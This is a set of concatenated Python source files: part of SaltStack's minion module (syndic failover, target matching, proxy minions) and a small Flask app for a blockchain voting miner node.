'Error while bringing up syndic for multi-syndic. Is the '
'master at %s responding?', opts['master']
)
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
failed = True
log.critical(
'Unexpected error while connecting to %s',
opts['master'], exc_info=True
)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if its connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result() # pylint: disable=no-member
self._syndics[master] = syndic.reconnect()
else:
# TODO: debug?
log.info(
'Attempting to mark %s as dead, although it is already '
'marked dead', master
)
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
successful = False
# Call for each master
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
successful = True
except SaltClientError:
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
if not successful:
log.critical('Unable to call %s on any masters!', func)
def _return_pub_syndic(self, values, master_id=None):
'''
Wrapper to call the '_return_pub_multi' a syndic, best effort to get the one you asked for
'''
func = '_return_pub_multi'
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
future, data = self.pub_futures.get(master, (None, None))
if future is not None:
if not future.done():
if master == master_id:
# Targeted master previous send not done yet, call again later
return False
else:
# Fallback master is busy, try the next one
continue
elif future.exception():
# Previous execution on this master returned an error
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
del self.pub_futures[master]
# Add not sent data to the delayed list and try the next master
self.delayed.extend(data)
continue
future = getattr(syndic_future.result(), func)(values,
'_syndic_return',
timeout=self._return_retry_timer(),
sync=False)
self.pub_futures[master] = (future, values)
return True
# Loop done and didn't exit: wasn't sent, try again later
return False
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
if self.opts['syndic_failover'] == 'random':
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.job_rets = {}
self.raw_events = []
def reconnect_event_bus(self, something):
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
self.local.event.subscribe('')
log.debug('SyndicManager \'%s\' trying to tune in', self.opts['id'])
# register the event sub to the poller
self.job_rets = {}
self.raw_events = []
self._reset_event_aggregation()
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
log.trace('Got event %s', mtag) # pylint: disable=no-member
tag_parts = mtag.split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in data:
if 'jid' not in data:
# Not a job return
return
if self.syndic_mode == 'cluster' and data.get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
master = data.get('master_id')
jdict = self.job_rets.setdefault(master, {}).setdefault(mtag, {})
if not jdict:
jdict['__fun__'] = data.get('fun')
jdict['__jid__'] = data['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if data['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](data['jid'])
)
self.jid_forward_cache.add(data['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if master is not None:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = master
ret = {}
for key in 'return', 'retcode', 'success':
if key in data:
ret[key] = data[key]
jdict[data['id']] = ret
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in data:
self.raw_events.append({'data': data, 'tag': mtag})
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
events = self.raw_events
self.raw_events = []
self._call_syndic('_fire_master',
kwargs={'events': events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self._return_retry_timer(),
'sync': False,
},
)
if self.delayed:
res = self._return_pub_syndic(self.delayed)
if res:
self.delayed = []
for master in list(six.iterkeys(self.job_rets)):
values = list(six.itervalues(self.job_rets[master]))
res = self._return_pub_syndic(values, master_id=master)
if res:
del self.job_rets[master]
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: %s', matcher)
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: %s', tgt)
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.data.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: %s', tgt)
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.data.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(six.text_type(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: %s', tgt)
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.data.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: %s', tgt)
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.data.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: %s', tgt)
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.data.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on IP address or CIDR notation
'''
try:
# Target is an address?
tgt = ipaddress.ip_address(tgt)
except: # pylint: disable=bare-except
try:
# Target is a network?
tgt = ipaddress.ip_network(tgt)
except: # pylint: disable=bare-except
log.error('Invalid IP/CIDR target: %s', tgt)
return []
proto = 'ipv{0}'.format(tgt.version)
grains = self.opts['grains']
if proto not in grains:
match = False
elif isinstance(tgt, (ipaddress.IPv4Address, ipaddress.IPv6Address)):
match = six.text_type(tgt) in grains[proto]
else:
match = salt.utils.network.in_subnet(tgt, grains[proto])
return match
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: %s', exc)
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
nodegroups = self.opts.get('nodegroups', {})
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: %s ? %s', self.opts['id'], tgt)
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
# we make a shallow copy in order to not affect the passed in arg
words = tgt[:]
while words:
word = words.pop(0)
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": %s', word)
return False
if word == 'not':
if not results[-1] in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
# seq start with binary oper, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: %s', word)
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
# if we encounter a node group, just evaluate it in-place
decomposed = salt.utils.minions.nodegroup_comp(target_info['pattern'], nodegroups)
if decomposed:
words = decomposed + words
continue
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error(
'Unrecognized target engine "%s" for target '
'expression "%s"', target_info['engine'], word
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
six.text_type(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(six.text_type(self.glob_match(word)))
results = ' '.join(results)
log.debug('compound_match %s ? "%s" => "%s"', self.opts['id'], tgt, results)
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error(
'Invalid compound target: %s for results: %s', tgt, results)
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinionManager(MinionManager):
'''
Create the multi-minion interface but for proxy minions
'''
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return ProxyMinion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check Minion._post_master_init
to see if those changes need to be propagated.
ProxyMinions need a significantly different post master setup,
which is why the differences are not factored out into separate helper
functions.
'''
log.debug("subclassed _post_master_init")
if self.connected:
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = 'No proxy key found in pillar or opts for id ' + self.opts['id'] + '. ' + \
'Check your pillar/opts configuration and contents. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
if self.opts.get('proxy_merge_pillar_in_opts'):
# Override proxy opts with pillar data when the user required.
self.opts = salt.utils.dictupdate.merge(self.opts,
self.opts['pillar'],
strategy=self.opts.get('proxy_merge_pillar_in_opts_strategy'),
merge_lists=self.opts.get('proxy_deep_merge_pillar_in_opts', False))
elif self.opts.get('proxy_mines_pillar'):
# Even when not required, some details such as mine configuration
# should be merged anyway whenever possible.
if 'mine_interval' in self.opts['pillar']:
self.opts['mine_interval'] = self.opts['pillar']['mine_interval']
if 'mine_functions' in self.opts['pillar']:
general_proxy_mines = self.opts.get('mine_functions', [])
specific_proxy_mines = self.opts['pillar']['mine_functions']
try:
self.opts['mine_functions'] = general_proxy_mines + specific_proxy_mines
except TypeError as terr:
log.error('Unable to merge mine functions from the pillar in the opts, for proxy {}'.format(
self.opts['id']))
fq_proxyname = self.opts['proxy']['proxytype']
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv'])
# Pull in the utils
self.utils = salt.loader.utils(self.opts)
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts, utils=self.utils)
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.proxy.pack['__utils__'] = self.utils
# Reload all modules so all dunder variables are injected
self.proxy.reload_modules()
# Start engines here instead of in the Minion superclass __init__
# This is because we need to inject the __proxy__ variable but
# it is not setup until now.
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager, proxy=self.proxy)
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
self.module_executors = self.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = self.proxy[fq_proxyname + '.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
if self.connected and self.opts['pillar']:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
if hasattr(self, 'schedule'):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')],
proxy=self.proxy)
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'run_on_start': True,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
# proxy keepalive
proxy_alive_fn = fq_proxyname+'.alive'
if (proxy_alive_fn in self.proxy
and 'status.proxy_reconnect' in self.functions
and self.opts.get('proxy_keep_alive', True)):
# if `proxy_keep_alive` is either not specified, either set to False does not retry reconnecting
self.schedule.add_job({
'__proxy_keepalive':
{
'function': 'status.proxy_reconnect',
'minutes': self.opts.get('proxy_keep_alive_interval', 1), # by default, check once per minute
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {
'proxy_name': fq_proxyname
}
}
}, persist=True)
self.schedule.enable_schedule()
else:
self.schedule.delete_job('__proxy_keepalive', persist=True)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv='base')
self.grains_cache = self.opts['grains']
self.ready = True
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
# Need to load the modules so they get all the dunder variables
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
# Pull in the utils
minion_instance.utils = salt.loader.utils(minion_instance.opts)
# Then load the proxy module
minion_instance.proxy = salt.loader.proxy(minion_instance.opts, utils=minion_instance.utils)
# And re-load the modules so the __proxy__ variable gets injected
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
minion_instance.functions.pack['__proxy__'] = minion_instance.proxy
minion_instance.proxy.pack['__salt__'] = minion_instance.functions
minion_instance.proxy.pack['__ret__'] = minion_instance.returners
minion_instance.proxy.pack['__pillar__'] = minion_instance.opts['pillar']
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
minion_instance.utils = salt.loader.utils(minion_instance.opts, proxy=minion_instance.proxy)
minion_instance.proxy.pack['__utils__'] = minion_instance.utils
# Reload all modules so all dunder variables are injected
minion_instance.proxy.reload_modules()
fq_proxyname = opts['proxy']['proxytype']
minion_instance.module_executors = minion_instance.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = minion_instance.proxy[fq_proxyname + '.init']
proxy_init_fn(opts)
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.user.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
Minion._thread_multi_return(minion_instance, opts, data)
else:
Minion._thread_return(minion_instance, opts, data)
class SProxyMinion(SMinion):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SProxyMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.opts['grains'] = salt.loader.grains(self.opts)
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = (
'No "proxy" configuration key found in pillar or opts '
'dictionaries for id {id}. Check your pillar/options '
'configuration and contents. Salt-proxy aborted.'
).format(id=self.opts['id'])
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=False, proxy=self.proxy)
self.returners = salt.loader.returners(self.opts, self.functions, proxy=self.proxy)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts, self.functions, proxy=self.proxy)
fq_proxyname = self.opts['proxy']['proxytype']
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv'])
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.proxy.pack['__utils__'] = self.utils
# Reload all modules so all dunder variables are injected
self.proxy.reload_modules()
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)
self.module_executors = self.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = self.proxy[fq_proxyname + '.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv='base')
self.grains_cache = self.opts['grains']
self.ready = True
|
interface.py
|
'''
title : interface.py
description : A blockchain voting miner node implemenation, with the following features
- Verification of vote (based on RSA algorithm)
- Vote counting
author : Jerry Xie
date_created : 20190118
date_modified : 20190319
version : 0.1
usage : python3 interface.py
python_version : 3.6.5
Comments :
References : This project is inspired by
https://hackernoon.com/learn-blockchains-by-building-one-117428612f46 and
https://github.com/dvf/blockchain
'''
import sys
sys.path.append("./Modal")
sys.path.append("./View")
sys.path.append("./Controller")
sys.path.append("Node/Modal")
sys.path.append("Node/View")
sys.path.append("Node/Controller")
from time import ctime
from blockChain import Blockchain
from vote import Vote
from core_logic import gen_id, verify_object_signature
from helper import restor_from_file
import requests
from flask import Flask, jsonify, request, render_template, abort
# Allowing request from other server(node)
from flask_cors import CORS
# Handling path string
import os
tmpl_dir = os.path.join(os.path.dirname(
os.path.abspath(__file__)), 'View/templates')
sta_dir = os.path.join(os.path.dirname(
os.path.abspath(__file__)), 'View/static')
# Instantiate the Blockchain
blockchain = restor_from_file()
if not blockchain:
blockchain = Blockchain()
blockchain.curr_session = []
blockchain.update_chain_from_nodes()
MINERS_PUBLIC_ADDRESS = restor_from_file('pub.der')
MINERS_PRIVATE_ADDRESS = restor_from_file('pri.der')
import threading
MINER_WORKER = None
def get_candidate_public_key_from_some_secure_channel():
# This can be done by downloading from https servers
return '30819f300d06092a864886f70d010101050003818d0030818902818100abfac79b3656f20de2cda012482788f78a0b6e891c6b93c946c3b14617a6aa743b49a9fbbd426245b7ef8382f20c2a6f0d29ab92699961076fe38658f4e6a4bbbdededc053aa445f78a0aaf17559ee8fea17e2f19b812201c7b4a7f8029f2df8fb030561f25d8b7e9c829530633ea1cb68aed505574c34e74b2b6e20b88d20990203010001'
def from_locoal_host(request):
ip = None
if request.headers.getlist("X-Forwarded-For"):
ip = request.headers.getlist("X-Forwarded-For")[0]
else:
ip = request.remote_addr
return ip == '127.0.0.1'
def return_fresh_thread(arguments):
global blockchain
return threading.Thread(target=blockchain.mine, args=arguments)
# Instantiate the Node
app = Flask(__name__, static_folder=sta_dir, template_folder=tmpl_dir)
CORS(app)
@app.template_filter('ctime')
def timectime(s):
return ctime(s) # datetime.datetime.fromtimestamp(s)
@app.route('/')
def index():
global MINER_WORKER
global blockchain
table_items_outstanding = blockchain.curr_session
# for vote_dict in blockchain.curr_session:
# table_items_outstanding.append(vote_dict)
table_items_mined = blockchain.chain
isMining = MINER_WORKER and MINER_WORKER.isAlive()
return render_template('./index.html', index_is="isMining", table_items_outstanding=table_items_outstanding, table_items_mined=table_items_mined, isMining=isMining)
@app.route('/mine', methods=['GET'])
def start_mining():
global blockchain
global MINER_WORKER
global MINERS_PRIVATE_ADDRESS
global MINERS_PUBLIC_ADDRESS
response = {}
code = 200
if not MINERS_PUBLIC_ADDRESS or not MINERS_PRIVATE_ADDRESS:
response['error'] = "Please set your key-pair first"
code = 400
elif MINER_WORKER and MINER_WORKER.isAlive():
response['error'] = "This node is already mining."
code = 400
else:
MINER_WORKER = return_fresh_thread(
(MINERS_PUBLIC_ADDRESS, MINERS_PRIVATE_ADDRESS))
MINER_WORKER.start()
return jsonify(response), code
@app.route('/configure')
def configure():
global blockchain
registered_nodes = list(blockchain.nodes)
return render_template('./configure.html', index_is="isConfiguring", registered_nodes=registered_nodes)
@app.route('/import_id')
def new_id():
return render_template('./import_id.html', index_is="isImporting")
@app.route('/identity/new', methods=['GET'])
def new_identity():
response = gen_id()
global MINERS_PRIVATE_ADDRESS
global MINERS_PUBLIC_ADDRESS
MINERS_PRIVATE_ADDRESS = response.pop("private_key")
MINERS_PUBLIC_ADDRESS = response.get("public_key")
return jsonify(response), 200
# Functions below are open to the public
@app.route('/chain', methods=['GET'])
def get_chain():
global blockchain
response = blockchain.export_chain()
return jsonify(response), 200
@app.route('/transactions/get', methods=['GET'])
def get_transactions():
# Get transactions from transactions pool
outstanding_rslt = blockchain.curr_session
response = {'transactions': outstanding_rslt}
return jsonify(response), 200
@app.route('/register_nodes', methods=['POST'])
def register_nodes():
global blockchain
values = request.form
required = ['nodes']
response = {}
if not all(k in values for k in required):
response['error'] = "Missing values"
return jsonify(response), 400
if blockchain.connect_node(values['nodes']) > 0:
response['error'] = "Invalid url"
return jsonify(response), 400
response['message'] = "The node is registered."
return jsonify(response), 200
@app.route('/transactions/new', methods=['POST'])
def new_transaction():
global blockchain
values = request.form
response = {}
# Check that the required fields are in the POST'ed data
required = ['voter_address_con', 'vote2_con', 'signature_con', 'can_sign']
if not all(k in values for k in required):
response['error'] = 'Missing values'
return jsonify(response), 400
if not verify_object_signature(get_candidate_public_key_from_some_secure_channel(), values['can_sign'], values['vote2_con']):
response['error'] = "Invalid Candidate"
return jsonify(response), 400
# Create a new Transaction
rslt = blockchain.submit_transaction(
values['voter_address_con'], values['vote2_con'], values['signature_con'])
if rslt == -1:
response['error'] = 'Invalid Vote!'
return jsonify(response), 400
response = {'message': 'Transaction will be added to Block soon.'}
return jsonify(response), 200
if __name__ == '__main__':
from argparse import ArgumentParser
import atexit
from helper import dump2file
atexit.register(dump2file, blockchain)
parser = ArgumentParser()
parser.add_argument('-p', '--port', default=5000,
type=int, help='port to listen on')
args = parser.parse_args()
port = args.port
try:
app.run(host='0.0.0.0', port=port)
except:
dump2file(blockchain)
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement
import os
import re
import sys
import copy
import time
import types
import signal
import fnmatch
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
if six.PY3:
import ipaddress
else:
import salt.ext.ipaddress as ipaddress
from salt.ext.six.moves import range
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
try:
import zmq
# TODO: cleanup
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
